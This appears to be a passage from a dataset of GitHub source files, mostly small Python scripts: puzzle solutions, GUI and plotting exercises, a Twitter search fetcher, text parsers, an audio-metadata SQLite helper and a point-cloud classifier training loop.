debug=True)\n\n","repo_name":"rpayal/docker-compose","sub_path":"product/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73901070488","text":"with open(\"1_input.txt\",\"r\") as f:\n input1 = f.read().splitlines()\n\ncount = 0\ntemp = [int(input1[0]), int(input1[1]), int(input1[2])]\nfor i in range(3, len(input1)):\n initial_sum = sum(temp)\n temp = temp[1:] + [int(input1[i])]\n next_sum = sum(temp)\n if initial_sum < next_sum:\n count += 1\n\nprint(f\"Answer is {count}\")","repo_name":"BullHacks3/AdventOfCode2021","sub_path":"Day1/2_Sonar_Sweep.py","file_name":"2_Sonar_Sweep.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42160661278","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nfrom random import Random\n\n'''Ejemplo basado en un artículo en la siguiente liga: http://zetcode.com/tutorials/pyqt4/drawing/'''\n\nclass PaintWindow(QWidget):\n\t\n\tdef __init__(self):\n\t\t\n\t\tsuper(PaintWindow, self).__init__()\n\t\t\n\t\tself.initUI()\n\t\n\tdef initUI(self):\n\t\tself.setWindowTitle('Tarea1 - Adrian Revuelta Cuauhtli')\n\t\tself.setGeometry(100, 200, 600, 400)\n\t\tself.show()\n\t\t\n\tdef paintEvent(self, e):\n\t\tqpainter = QPainter()\n\t\n\t\tqpainter.begin(self)\n\t\t\n\t\t#Draw background\n\t\tqpainter.setBrush(Qt.black)\n\t\tqpainter.drawRect(QRect(0, 0, 600, 400))\n\t\t\n\t\t#Draw dots\n\t\tqpainter.setPen(Qt.white)\n\t\tr = Random()\n\t\tfor x in range(100):\n\t\t\tqpainter.drawPoint(r.randint(1, self.width()), r.randint(1,self.height()))\n\t\t\n\t\t\n\t\tqpainter.end()\n\nif __name__ == '__main__':\n\n\tapp = QApplication(sys.argv)\n\t\n\tmainWindow = PaintWindow()\n\t\n\tsys.exit(app.exec_())","repo_name":"arcra/Graficacion","sub_path":"Tarea1/Tarea1.py","file_name":"Tarea1.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40931686192","text":"def solution(s, n):\n answer = ''\n for i in range(len(s)):\n temp = ord(s[i]) + n\n if (ord(s[i]) == 32):\n answer += \" \"\n elif (ord(s[i]) <= 90 and temp > 90):\n temp = 65 + (temp - 91)\n answer += chr(temp)\n elif (ord(s[i]) <= 122 and temp > 122):\n temp = 97 + (temp - 123)\n answer += chr(temp)\n else:\n answer += chr(temp)\n\n return answer","repo_name":"Parksohui/Algorithm","sub_path":"programmers/시저 암호.py","file_name":"시저 암호.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17464053728","text":"\r\nimport tkinter as tk\r\nfrom tkinter import font\r\n\r\n\r\nclass AlertWindow:\r\n def __init__(self, steps):\r\n self.window = tk.Tk()\r\n self.window.title('')\r\n self.window.geometry('300x100')\r\n self.window.geometry(\"+500+300\")\r\n self.label = ''\r\n self.icon = tk.PhotoImage(file='./images/pathfinder_icon.png')\r\n self.window.iconphoto(True, self.icon)\r\n self.window.title(' Results')\r\n\r\n if steps == 0:\r\n self.label = tk.Label(self.window, text='No path found !!!')\r\n self.label.pack()\r\n self.label.place(x=80, y=35)\r\n\r\n self.font = font.Font(weight='bold', size=12)\r\n self.label.configure(foreground='red', font=self.font)\r\n else:\r\n self.label = tk.Label(self.window, text=f'Step Cost: {steps}')\r\n self.label.pack()\r\n self.label.place(x=95, y=35)\r\n\r\n self.font = font.Font(weight='bold', size=12)\r\n self.label.configure(font=self.font)\r\n\r\n self.window.mainloop()\r\n","repo_name":"blubu/path-finder","sub_path":"alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"73345716887","text":"import json\nfrom functools import reduce\n\nfrom flask_pluginengine import current_plugin\n\n\ndef get_json_from_remote_server(func, **kwargs):\n \"\"\"\n Safely manage calls to the remote server by encapsulating JSON creation\n from Piwik data.\n \"\"\"\n rawjson = func(**kwargs)\n if rawjson is None:\n # If the request failed we already logged in in PiwikRequest;\n # no need to get into the exception handler below.\n return {}\n try:\n data = json.loads(rawjson)\n if isinstance(data, dict) and data.get('result') == 'error':\n current_plugin.logger.error('The Piwik server responded with an error: %s', data['message'])\n return {}\n return data\n except Exception:\n current_plugin.logger.exception('Unable to load JSON from source %s', rawjson)\n return {}\n\n\ndef reduce_json(data):\n \"\"\"Reduce a JSON object\"\"\"\n return reduce(lambda x, y: int(x) + int(y), list(data.values()))\n\n\ndef stringify_seconds(seconds=0):\n \"\"\"\n Takes time as a value of seconds and deduces the delta in human-readable\n HHh MMm SSs format.\n \"\"\"\n seconds = int(seconds)\n minutes = seconds / 60\n ti = {'h': 0, 'm': 0, 's': 0}\n\n if seconds > 0:\n ti['s'] = seconds % 60\n ti['m'] = minutes % 60\n ti['h'] = minutes / 60\n\n return \"%dh %dm %ds\" % (ti['h'], ti['m'], ti['s'])\n","repo_name":"indico/indico-plugins","sub_path":"piwik/indico_piwik/queries/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"31"} +{"seq_id":"5371078028","text":"import pandas as pd\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.preprocessing import StandardScaler , LabelEncoder\r\nfrom sklearn import metrics\r\nimport numpy as np\r\n\r\ndef main():\r\n ''' Reading the Dataset using pandas '''\r\n logisticsdata = pd.read_csv('C:/Users/Bhagat/Documents/Python/ML/DataSets/logistic regression dataset-Social_Network_Ads.csv')\r\n print(logisticsdata)\r\n\r\n ''' Encode the categorical varibale using LabelEncoder '''\r\n \r\n label_encoder = LabelEncoder()\r\n Gender = label_encoder.fit_transform(logisticsdata['Gender'])\r\n\r\n ''' adding the gender feature into dataset '''\r\n logisticsdata = pd.concat([logisticsdata , pd.DataFrame(Gender , columns = ['Gender'])], axis =1)\r\n\r\n ''' spliting the dataset into training and testing sets '''\r\n xtrain = logisticsdata.iloc[:200,[2,3,5]]\r\n ytrain = logisticsdata.iloc[:200,4]\r\n\r\n xtest = logisticsdata.iloc[201:,[2,3,5]]\r\n ytest = logisticsdata.iloc[201:,4]\r\n\r\n ''' Using StandardScaler we have to scale down the feature value for better accuracy '''\r\n st_scale = StandardScaler()\r\n x_scale = st_scale.fit_transform(xtrain)\r\n\r\n xt_scale = st_scale.fit_transform(xtest)\r\n\r\n ''' Creating the model object and train model using the training dataset '''\r\n logmodel = LogisticRegression()\r\n\r\n logmodel.fit(x_scale,ytrain)\r\n\r\n ''' Predicting the values for test dataset '''\r\n \r\n ypred = logmodel.predict(xt_scale)\r\n\r\n\r\n # Printing the test predictated output values and showing the confusion matrix and accuracy score\r\n print(ypred)\r\n\r\n print('Confusion Matrix : ' ,metrics.confusion_matrix(ytest,ypred) , '\\n Accuracy Score : ' , metrics.accuracy_score(ytest,ypred))\r\n\r\n \r\nmain() \r\n","repo_name":"BhaveshBhagat/LogisticsRegression","sub_path":"Logistics_Model.py","file_name":"Logistics_Model.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42244710246","text":"import operator\nimport logging\n\nfrom app.config import app_api\nfrom app.utils import ActionType, SearchType\n\nimport tweepy\n\nlogging.basicConfig(filename='app.log', format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\n\nclass TweetFetcher:\n def __init__(self, text, mode, tweet_date=None, tweet_datetime=None):\n self.text = text\n self.mode = mode\n self.tweet_date = tweet_date\n self.tweet_datetime = tweet_datetime\n self.queries = []\n self.tweets = []\n\n def format_query(self, query):\n if self.tweet_date and self.mode == ActionType.old.value:\n query = f'\"{query}\"' + f'until%3A{self.tweet_date}' + \"-filter:retweets\"\n elif self.tweet_date and self.mode == ActionType.new.value:\n query = f'\"{query}\"' + f'since%3A{self.tweet_date}' + \"-filter:retweets\"\n else:\n query = f'\"{query}\"' + \"-filter:retweets\"\n\n return query\n\n def create_entire_phrase_query(self):\n query = self.text.text.lower()\n formatted_query = self.format_query(query)\n self.queries.append(formatted_query)\n\n def create_sentences_query(self):\n sentences = []\n for sentence in list(self.text.sents):\n sentences.append(sentence)\n\n query = ''\n sentences_left = len(sentences)\n for sentence in sentences:\n sentences_left -= 1\n query += f'\"{sentence.text.lower()}\"'\n if sentences_left > 0:\n query += \"%20OR%20\"\n\n query = \"(\" + query + \")\"\n\n formatted_query = self.format_query(query)\n self.queries.append(formatted_query)\n\n def create_words_query(self):\n pos = ['PROPN', 'NOUN', 'ADJ']\n dep = ['compound', 'nsubj', 'ROOT']\n\n query = []\n\n for word in self.text:\n if word.dep_ in dep or word.pos_ in pos:\n query.append(word.text.lower())\n\n query = \"%20\".join(query)\n\n formatted_query = self.format_query(query)\n self.queries.append(formatted_query)\n\n def filter_tweets_by_time(self, tweets, comparison):\n filtered_tweets = []\n for tweet in tweets:\n if comparison(self.tweet_datetime, tweet.created_at):\n filtered_tweets.append(tweet)\n\n return filtered_tweets\n\n @staticmethod\n def search(queries, search_type):\n tweets = []\n for query in queries:\n try:\n tweets += app_api.search(q=query, include_entities=False, count=100,\n result_type=search_type, tweet_mode='extended')\n except tweepy.error.TweepError as e:\n logging.error(e, exc_info=True)\n\n return tweets\n\n def fetch_tweets(self):\n if self.mode == ActionType.old.value:\n tweets = TweetFetcher.search(self.queries, SearchType.mixed.value)\n self.tweets = self.filter_tweets_by_time(tweets, operator.gt)\n\n elif self.mode == ActionType.new.value:\n tweets = TweetFetcher.search(self.queries, SearchType.recent.value)\n self.tweets = self.filter_tweets_by_time(tweets, operator.lt)\n\n else:\n tweets = TweetFetcher.search(self.queries, SearchType.mixed.value)\n self.tweets = tweets\n\n return self.tweets\n\n\ndef fetch(tweet_text, mode, tweet_date=None, tweet_datetime=None):\n tweet_fetcher = TweetFetcher(tweet_text, mode, tweet_date, tweet_datetime)\n tweet_fetcher.create_entire_phrase_query()\n tweet_fetcher.create_sentences_query()\n tweet_fetcher.create_words_query()\n fetched_tweets = tweet_fetcher.fetch_tweets()\n return fetched_tweets\n","repo_name":"HAKSOAT/Kaitlyn","sub_path":"app/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"31"} +{"seq_id":"71761143770","text":"class Solution:\n def maxEnvelopes(self, envelopes: List[List[int]]) -> int:\n if not envelopes:\n return 0\n envelopes.sort(key=lambda x: (x[0],-x[1]))\n n = len(envelopes)\n res=[envelopes[0][1]]\n for i in range(1,n):\n h = envelopes[i][1]\n if h > res[-1]:\n res.append(h)\n else:\n idx = bisect.bisect_left(res,h)\n res[idx] = h\n return len(res)\n \n","repo_name":"zhaoranz/my-solutions-leetcode","sub_path":"Russian Doll Envelopes.py","file_name":"Russian Doll Envelopes.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3060467401","text":"import intervals as I\nimport numpy as np\nfrom Strategy import Segmentation\n\nclass Parser:\n\n def __init__(self,string):\n self.index = 0\n self.string = ''.join(string.split())\n\n ## Helper functions\n\n def peek(self):\n return self.string[self.index]\n\n def hasNext(self):\n return self.index < len(self.string)\n\n def isNext(self,c):\n if self.hasNext():\n return self.string[self.index] == c\n else:\n return False\n\n def pop(self):\n c = self.string[self.index]\n self.index += 1\n return c\n\n def popIfNext(self,c):\n if self.isNext(c):\n return self.pop()\n else:\n return False\n\nclass IntervalParser(Parser):\n\n def __init__(self,string):\n super().__init__(string)\n self.peek = super().peek\n self.hasNext = super().hasNext\n self.isNext = super().isNext\n self.pop = super().pop\n self.popIfNext = super().popIfNext\n self.interval = self.parseExpression()\n\n ## Parsing functions\n\n def parseExpression(self):\n if self.popIfNext('{'):\n interval = self.parseUnion()\n if not self.popIfNext('}'):\n raise ValueError(\"No closing curly bracket found.\")\n elif self.popIfNext('&'):\n return interval & self.parseExpression()\n elif self.popIfNext('|'):\n return interval | self.parseExpression()\n elif not self.hasNext():\n return interval\n else:\n raise ValueError('Unexpected character encountered.')\n else:\n return self.parseUnion()\n\n def parseUnion(self):\n if self.peek() == '{':\n return self.parseExpression()\n else:\n interval = self.parseIntersection()\n while self.popIfNext('|'):\n interval = interval | self.parseIntersection()\n return interval\n\n def parseIntersection(self):\n if self.peek() == '{':\n return self.parseExpression()\n else:\n interval = self.parseInterval()\n while self.popIfNext('&'):\n if self.peek() == '{':\n interval = interval & self.parseExpression()\n else:\n interval = interval & self.parseInterval()\n return interval\n\n def parseInterval(self):\n left = self.pop()\n if left not in '[(':\n raise ValueError('Unexpected character, expected [ or (.')\n\n lower = self.parseFloat()\n\n if self.pop() != ',':\n raise ValueError('Unexpected character, expected ,.')\n\n upper = self.parseFloat()\n\n right = self.pop()\n if right not in ')]':\n raise ValueError('Unexpected character, expected ) or ].')\n\n if left+right == '[]':\n return I.closed(lower,upper)\n elif left+right == '[)':\n return I.closedopen(lower,upper)\n elif left+right == '(]':\n return I.openclosed(lower,upper)\n elif left+right == '()':\n return I.open(lower,upper)\n\n def parseFloat(self):\n num = ''\n hasDot = False\n sign = 1\n if self.popIfNext('-'):\n sign = -1\n while self.peek() in '0123456789.':\n c = self.pop()\n if c == '.':\n if not hasDot:\n hasDot = True\n else:\n raise ValueError('Unexpected period found in string.')\n num += c\n if num == '':\n raise ValueError('Unexpected character, expected float.')\n return sign*float(num)\n\nclass SegmentationParser(Parser):\n\n def __init__(self,string):\n super().__init__(string)\n self.peek = super().peek\n self.hasNext = super().hasNext\n self.isNext = super().isNext\n self.pop = super().pop\n self.popIfNext = super().popIfNext\n self.segmentation = self.parseSegmentation()\n\n def parseSegmentation(self):\n points = []\n delimiters = []\n while self.index < len(self.string)-1:\n if self.peek() in '])':\n if len(delimiters) == len(points):\n raise ValueError(\"Unexpected delimiter found.\")\n else:\n c = self.pop()\n if c == ']':\n delimiters.append(0)\n else:\n delimiters.append(1)\n elif len(points) == len(delimiters):\n points.append(self.parseFloat())\n else:\n raise ValueError(\"Numbers and delimiters do not match.\")\n\n if self.peek() in '])':\n if len(delimiters) == len(points):\n raise ValueError(\"Unexpected delimiter found.\")\n else:\n c = self.pop()\n if c == ']':\n delimiters.append(0)\n else:\n delimiters.append(1)\n else:\n raise ValueError(\"Missing closing delimiter.\")\n\n return Segmentation(points,delimiters)\n\n def parseFloat(self):\n num = ''\n hasDot = False\n sign = 1\n if self.popIfNext('-'):\n sign = -1\n while self.peek() in '0123456789.':\n c = self.pop()\n if c == '.':\n if not hasDot:\n hasDot = True\n else:\n raise ValueError('Unexpected period found in string.')\n num += c\n if num == '':\n raise ValueError('Unexpected character, expected float.')\n return sign*float(num)\n","repo_name":"DanielAhlsen/GCGMP","sub_path":"Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":5672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18737540009","text":"from os import listdir\nfrom os.path import isfile, isdir, join, splitext\nimport mutagen\nimport subprocess\nimport sqlite3 \n\ndef extension(path):\n return splitext(path)[-1]\n\ndef getAudioDatabase(path):\n if not isdir(path):\n raise ValueError(\"Please supply a directory to scan for audio files\")\n\n files = [f for f in listdir(path) \n if isfile(join(path, f)) and extension(f) not in (\".m3u\",\".sqlite3\", \".aup\")]\n audioFiles = list(filter(None, [AudioFile.fromFile(path, f) for f in files]))\n \n if len(audioFiles) == 0:\n raise ValueError(\"Please supply a directory with audio files\")\n\n database = sqlite3.connect(join(path, 'data.sqlite3'), isolation_level=None)\n createTables(database)\n\n for f in audioFiles:\n f.initRow(database)\n\n return dict([(f.id, f) for f in audioFiles])\n\ndef getAudioLength(filePath):\n data = mutagen.File(filePath)\n if data:\n return data.info.length\n \n cmd = ['ffprobe', '-i', filePath, '-show_entries', 'format=duration', '-v', 'quiet', '-of', 'csv=p=0']\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n stdout, stderr = process.communicate()\n \n try:\n return float(stdout.decode('utf8').strip())\n except ValueError:\n print(\"Not an audio file: \"+filePath)\n return None\n\nclass AudioFile:\n @staticmethod\n def fromFile(path, fileName):\n #print(fileName);\n length = getAudioLength(join(path, fileName))\n if not length: \n return None\n return AudioFile(fileName, length)\n\n def __init__(self, fileName, length):\n self.id = None\n self.name = splitext(fileName)[0]\n self.fileName = fileName\n self.length = length\n self.info = {}\n \n def initRow(self, db):\n self.db = db\n rows = db.execute(\n \"\"\"SELECT id, filename, name FROM audio WHERE filename = ?\"\"\", \n (self.fileName,)\n ).fetchall()\n if len(rows) == 0:\n self.insert()\n else:\n row = rows[0]\n (self.id, self.fileName, self.name) = row\n self._fetchInfo()\n #print(self)\n\n def _fetchInfo(self):\n rows = self.db.execute(\n \"\"\"SELECT key, value FROM audio_info WHERE audio_id = ?\"\"\", \n (self.id,)\n ).fetchall()\n self.info = dict(rows)\n\n def insert(self):\n self.id = self.db.execute(\n \"INSERT INTO audio(fileName, name, length) VALUES(?, ?, ?)\", \n (self.fileName, self.name, self.length)).lastrowid\n\n def update(self):\n if self.id is None:\n raise ValueError(\"Trying to update a file without id. What are you doing boy?\")\n self.db.execute(\n \"\"\"UPDATE audio SET name = ? WHERE id = ?\"\"\",\n (self.name, self.id)\n )\n self._saveInfo()\n\n def _saveInfo(self):\n self.db.execute( \"\"\"DELETE FROM audio_info WHERE audio_id = ?\"\"\", (self.id,))\n for (key, value) in self.info.items():\n self.db.execute(\n \"INSERT INTO audio_info(audio_id, key, value) VALUES(?, ?, ?)\", \n (self.id, key, value))\n\n def toDict(self):\n items = dict(self.__dict__)\n del items[\"db\"]\n return items\n\n def __repr__(self):\n items = (\"%s = %r\" % (k, v) for k, v in self.__dict__.items())\n return \"<%s: {%s}>\" % (self.__class__.__name__, ', '.join(items))\n\ndef createTables(con):\n cur = con.cursor()\n cur.executescript(\"\"\"\nCREATE TABLE IF NOT EXISTS audio(\n id INTEGER PRIMARY KEY,\n filename TEXT,\n name TEXT,\n length INTEGER\n);\nCREATE TABLE IF NOT EXISTS audio_info (\n audio_id INTEGER,\n key TEXT,\n value TEXT\n);\n \"\"\")\n","repo_name":"Purrrrrr/Tanssiaistietokanta","sub_path":"legacy/audiofiles.py","file_name":"audiofiles.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40756408581","text":"class Graph(object):\n def __init__(self):\n pass\n \n class Node(self, data):\n self.data = data\n self.adjacent = []\n\n def __eq__(self, another):\n if self.data == another.data:\n return True\n else:\n return False\n\n def hasPathDFS(self, source, dest):\n visited = set()\n return self.hasPathDfsRec(source, dest, visited)\n\n def hasPathDfsRec(self, source, dest, visited):\n if source.data in visited:\n return False\n else:\n visited.add(source)\n if source == dest:\n return True\n for child in source.adjacent:\n if self.hasPathDfsRec(child, dest, visited):\n return True\n return False\n\n def hasPathBFS(self, source, dest):\n nextToVisit = list()\n visited = set()\n nextToVisit.append(source)\n\n while not nextToVisit:\n popped = nextToVisit.pop(0)\n if popped == dest:\n return True\n else:\n if popped not in visited:\n visited.add(popped)\n # Add children to end of list\n for child in popped.adjacent:\n nextToVisit.append(child)\n \n return False\n","repo_name":"dhavalpowar/learn","sub_path":"python/data_structures/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74856697052","text":"import os\n\nimport numpy as np\nimport torch.nn as nn\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import balanced_accuracy_score\nfrom sklearn.metrics import classification_report\nfrom tensorboardX import SummaryWriter\nfrom torch.utils.data.dataloader import DataLoader\n\nfrom point_gcn.models.net import MultiLayerGCN\nfrom point_gcn.runner.runner import Runner\nfrom point_gcn.tools.utils import import_class\n\n\nclass TrainRunner(Runner):\n def __init__(self, args):\n super(TrainRunner, self).__init__(args)\n # loss\n self.loss = nn.CrossEntropyLoss().to(self.output_dev)\n\n def load_dataset(self):\n feeder_class = import_class(self.args.dataset)\n feeder = feeder_class(\n self.args.data_path, num_points=self.args.num_points,\n k=self.args.knn, phase='train'\n )\n self.num_classes = feeder.num_classes\n self.shape_names = feeder.shape_names\n train_data = DataLoader(\n dataset=feeder,\n batch_size=self.args.train_batch_size,\n shuffle=True,\n num_workers=8\n )\n self.dataset['train'] = train_data\n self.print_log(f'Train data loaded: {len(feeder)} samples.')\n\n if self.args.eval_model:\n feeder = feeder_class(\n self.args.data_path, num_points=self.args.num_points,\n k=self.args.knn, phase='test'\n )\n test_data = DataLoader(\n dataset=feeder,\n batch_size=self.args.test_batch_size,\n shuffle=False,\n num_workers=8\n )\n self.dataset['test'] = test_data\n self.print_log(f'Test data loaded: {len(feeder)} samples.')\n\n def load_model(self):\n model = MultiLayerGCN(\n dropout=self.args.dropout, num_classes=self.num_classes\n )\n self.model = model.to(self.output_dev)\n\n def initialize_model(self):\n if self.args.weights is not None:\n self.load_model_weights(\n self.model,\n self.args.weights,\n self.args.ignore\n )\n self.load_optimizer_weights(self.optimizer, self.args.weights)\n self.load_scheduler_weights(self.scheduler, self.args.weights)\n\n def run(self):\n best_epoch = -1\n best_acc = 0.0\n for epoch in range(self.epoch, self.args.num_epochs):\n self._train_model(epoch)\n eval_model = self.args.eval_model and (\n ((epoch + 1) % self.args.eval_interval == 0) or\n (epoch + 1 == self.args.num_classifier_epochs))\n if eval_model:\n acc = self._eval_model(epoch)\n if acc > best_acc:\n best_acc = acc\n best_epoch = epoch\n self.print_log(\n 'Best accuracy: {:.2f}%, best model: model{}.pt'.format(\n best_acc * 100.0, best_epoch + 1\n ))\n\n def _train_model(self, epoch):\n self.print_log(f'Train Epoch: {epoch + 1}')\n self.model.train()\n\n loader = self.dataset['train']\n loss_values = []\n\n self.record_time()\n timer = dict(data=0.0, model=0.0, statistic=0.0)\n for batch_id, (x, adj, label) in enumerate(loader):\n # get data\n x = x.float().to(self.output_dev)\n adj = adj.float().to(self.output_dev)\n label = label.long().to(self.output_dev)\n timer['data'] += self.tick()\n\n # forward\n pred = self.model(adj, x)\n loss = self.loss(pred, label)\n\n # backward\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n timer['model'] += self.tick()\n\n # statistic\n loss_values.append(loss.item())\n if (batch_id + 1) % self.args.log_interval == 0:\n self.print_log(\n 'Batch({}/{}) done. Loss: {:.4f}, lr: {:.5f}'.format(\n batch_id + 1, len(loader), loss.item(),\n self.optimizer.param_groups[0]['lr']\n ))\n timer['statistic'] += self.tick()\n self.scheduler.step()\n\n mean_loss = np.mean(loss_values)\n self.print_log('Mean training loss: {:.4f}.'.format(mean_loss))\n self.print_log(\n 'Time consumption: [Data] {:.1f} min, [Model] {:.1f} min'.format(\n timer['data'] / 60.0, timer['model'] / 60.0\n ))\n\n if self.args.save_model and (epoch + 1) % self.args.save_interval == 0:\n model_path = os.path.join(\n self.model_path, 'model{}.pt'.format(epoch + 1)\n )\n self.save_weights(\n epoch, self.model, self.optimizer, self.scheduler, model_path\n )\n\n if self.args.use_tensorboard:\n with SummaryWriter(log_dir=self.tensorboard_path) as writer:\n writer.add_scalar('train/classifier_loss', mean_loss, epoch)\n\n def _eval_model(self, epoch):\n self.print_log(f'Eval Epoch: {epoch + 1}')\n self.model.eval()\n\n loader = self.dataset['test']\n loss_values = []\n pred_scores = []\n true_scores = []\n\n for batch_id, (x, adj, label) in enumerate(loader):\n # get data\n x = x.float().to(self.output_dev)\n adj = adj.float().to(self.output_dev)\n label = label.long().to(self.output_dev)\n\n # forward\n y = self.model(adj, x)\n loss = self.loss(y, label)\n\n # statistic\n loss_values.append(loss.item())\n if (batch_id + 1) % self.args.log_interval == 0:\n self.print_log(\n 'Batch({}/{}) done. Loss: {:.4f}'.format(\n batch_id + 1, len(loader), loss.item()\n ))\n pred = y.max(dim=1)[1]\n pred_scores.append(pred.data.cpu().numpy())\n true_scores.append(label.data.cpu().numpy())\n pred_scores = np.concatenate(pred_scores)\n true_scores = np.concatenate(true_scores)\n\n mean_loss = np.mean(loss_values)\n overall_acc = accuracy_score(true_scores, pred_scores)\n avg_class_acc = balanced_accuracy_score(true_scores, pred_scores)\n self.print_log('Mean testing loss: {:.4f}.'.format(mean_loss))\n self.print_log('Overall accuracy: {:.2f}%'.format(overall_acc * 100.0))\n self.print_log(\n 'Average class accuracy: {:.2f}%'.format(avg_class_acc * 100.0)\n )\n\n if self.args.show_details:\n self.print_log('Detailed results:')\n report = classification_report(\n true_scores,\n pred_scores,\n target_names=self.shape_names,\n digits=4\n )\n self.print_log(report, print_time=False)\n\n if self.args.use_tensorboard:\n with SummaryWriter(log_dir=self.tensorboard_path) as writer:\n writer.add_scalar('test/loss', mean_loss, epoch)\n writer.add_scalar('test/overall_accuracy', overall_acc, epoch)\n writer.add_scalar(\n 'test/average_class_accuracy', avg_class_acc, epoch\n )\n\n return overall_acc\n","repo_name":"gyshgx868/pc-classification","sub_path":"point_gcn/runner/train_runner.py","file_name":"train_runner.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"3042188942","text":"def solution(s):\n\n snew = s[0].capitalize()\n \n for i in range(1, len(s)):\n if s[i] == ' ':\n snew += ' '\n elif s[i-1] != ' ':\n snew += s[i].lower()\n else:\n snew += s[i].capitalize()\n\n return snew\n\n # capitalize 문자열에서 맨 첫글자를 대문자로 변환시킨다.\n # title\t문자열에서 알파벳 외의 문자(숫자, 특수기호, 띄어쓰기 등)로 나누어져 있는 영단어들의 첫글자를 모두 대문자로 변환시킨다.","repo_name":"Jihyun503/Algorithm","sub_path":"Programmers/Level2/JadenCase 문자열 만들기.py","file_name":"JadenCase 문자열 만들기.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29807850245","text":"#!/usr/bin/env python3\n\nimport os\nimport matplotlib\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport matplotlib.lines as mlines\n\n\ndef barycenter_distance(d, m1, m2):\n return d * m2 / (m1 + m2)\n\n\nSUN_MASS = 1.9885*10**30\n\nEARTH_MASS = 5.97237*10**24\nEARTH_RADIUS = 6.378*10**6\nEARTH_SEMIMAJOR_AXIS = 1.49598023*10**11\n\nMOON_MASS = 7.342*10**22\nMOON_RADIUS = 1.737*10**6\nMOON_SEMIMAJOR_AXIS = 3.84399*10**8\n\nEARTH_MOON_DISTANCE = 3.84402 * 10**8\nEARTH_POS = (-barycenter_distance(EARTH_MOON_DISTANCE, EARTH_MASS, MOON_MASS), 0)\nMOON_POS = (+barycenter_distance(EARTH_MOON_DISTANCE, MOON_MASS, EARTH_MASS), 0)\n\n\nCOLOR_EARTH = 'darkblue'\nCOLOR_MOON = 'grey'\nCOLOR_MOON_ORBIT = 'silver'\nCOLOR_SC_ORBIT = 'black'\nCOLOR_ORBIT_LEO = 'grey'\nCOLOR_SOI = 'red'\n\n\ndef get_script_folder():\n return os.path.dirname(os.path.abspath(__file__))\n\n\nclass Plot(object):\n def __init__(self, config):\n \"\"\"\n config\n TODO\n xlim\n ylim\n infile\n outfile\n \"\"\"\n self.config = config\n self.data_raw = {}\n self.data_prepared = {}\n\n self.ax = plt.gca()\n self.fig = plt.gcf()\n self.figsizex, self.figsizey = self.fig.get_size_inches()\n\n if 'infile' in self.config:\n self.load_data_raw(config['infile'])\n\n def load_data_raw(self, infile):\n with open('%s\\\\%s' % (get_script_folder(), infile), 'r') as f:\n _header, *data_raw = f.readlines()\n\n data_parsed = [[int(tup) for tup in line.strip().split()] for line in data_raw]\n _time, earth_xs, earth_ys, moon_xs, moon_ys, sc_xs, sc_ys = np.array(data_parsed).transpose()\n\n self.data_raw = {\n 'earth_pos': (earth_xs, earth_ys),\n 'moon_pos': (moon_xs, moon_ys),\n 'sc_pos': (sc_xs, sc_ys),\n }\n\n def go(self):\n print('=== %s ===' % self.config['outfile'])\n self.data_prepare()\n self.configure_axis()\n self.plot()\n self.savefig()\n\t\t\n def display(self, title):\n plt.legend(loc = 0)\n plt.title(title)\n plt.show()\n\n def data_prepare(self):\n pass\n\n def plot(self):\n pass\n\n def configure_axis(self):\n ax = self.ax\n figsizex = self.figsizex\n figsizey = self.figsizey\n xlim = self.config['xlim']\n ylim = self.config['ylim']\n param = self.config['param']\n\n # configure size\n\n ax.set_aspect(1.0)\n\n ax.set_xlim(xlim)\n\n if ylim == 'auto':\n val = (xlim[1]-xlim[0]) * (figsizey/figsizex) / 2\n ylim = (-val, +val)\n print('ylim: auto')\n else:\n ideal_y = (xlim[1]-xlim[0]) * (figsizey/figsizex)\n current_y = ylim[1] - ylim[0]\n diff = ideal_y - current_y\n ylim = (ylim[0]-diff/2, ylim[1]+diff/2)\n print('ylim: current=%d, ideal=%d, diff=%d' % (current_y/10**6, ideal_y/10**6, diff/10**6))\n ax.set_ylim(ylim)\n\n print('Size: %d x %d' % ((xlim[1]-xlim[0])/10**6, 